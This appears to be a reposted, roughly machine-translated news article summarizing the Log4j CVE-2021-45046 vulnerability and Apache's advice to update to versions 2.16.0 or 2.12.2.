Friday, June 14, 2024

In addition to “Log4Shell” in the Java Log4j library, a new vulnerability “CVE-2021-45046” was discovered and can be fixed by updating –GIGAZINE


A critical vulnerability, CVE-2021-44228, commonly known as “Log4Shell”, has been discovered in Log4j, a Java log output library, which allows arbitrary code to be executed remotely. Apache Software Foundation (ASF), which provides Log4j, has a new vulnerability.CVE – 2021‑45046An update from Log4j to version 2.16.0 or later has been discovered and requested.

CVE – CVE-2021-45046

CVE-2021-45046: Red Hat Customer Portal

Log4Shell Update: Second log4j vulnerability released (CVE-2021-44228 + CVE-2021-45046) | LunaSec

Protection against CVE-2021-45046, the additional vulnerability Log4j RCE

The following articles summarize the vulnerabilities in Log4Shell that have been confirmed in Log4j version 2.0 beta 9 to version 2.14.1.

Why does the “Log4Shell (CVE-2021-44228)” vulnerability found in the Java Log4j library have a major impact on the world? – GIGAZINE

On December 10, 2021, ASF released version 2.15.0 with Log4Shell protection. However, it turns out that the Log4Shell countermeasures are insufficient in certain configurations other than the default. According to Apache, when using a non-default PatternLayout, use Context Lookup ($ {ctx: loginId}, etc.) or Thread Context Map (% X,% mdc,% MDC) to handle the input data of the thread context. An attacker who can create bad input data with a JNDI reference pattern andDOS attackThere was a possibility that it could cause.

So far, as a workaround for the Log4Shell exploit, a method has been introduced to set “log4j2.noFormatMsgLookup” to True, but CVE-2021-45046 could avoid this invalid configuration and attack.

Therefore, ASF released version 2.16.0 (Java 8 or later) on December 14, 2021. Version 2.16.0 addresses the newly discovered vulnerability CVE-2021-45046. In version 2.16.0, the JNDI function itself is disabled by default and the message search function has been removed …

ASF has also released Log4j version 2.12.2 for the Java 7 runtime. Previously, version 2.12.1 was the final version of Log4j for Java 7, but version 2.12.2 of the Java 7 runtime was released to support Log4Shell and CVE-2021-45046. ASF requests Log4j updates as soon as possible.

Copy the title and URL of this article.

Ebenezer Robbins
Ebenezer Robbins
Introvert. Beer guru. Communicator. Travel fanatic. Web advocate. Certified alcohol geek. Tv buff. Subtly charming internet aficionado.

Share post:


More like this

Green Glamour: How to Achieve Eco-Friendly Acrylic Nails

In the vibrant world of beauty and nail care,...

The Future Of Horse Racing In The Digital Age  

Horse racing, a sport steeped in tradition and history,...

How to Sell CS:GO Skins for Real Money

CS:GO skins have become not just an ordinary design...

Decoding The Diversity: A Guide To Different Types Of Horse Races

Horse racing reaches 585 million households worldwide, enjoying immense...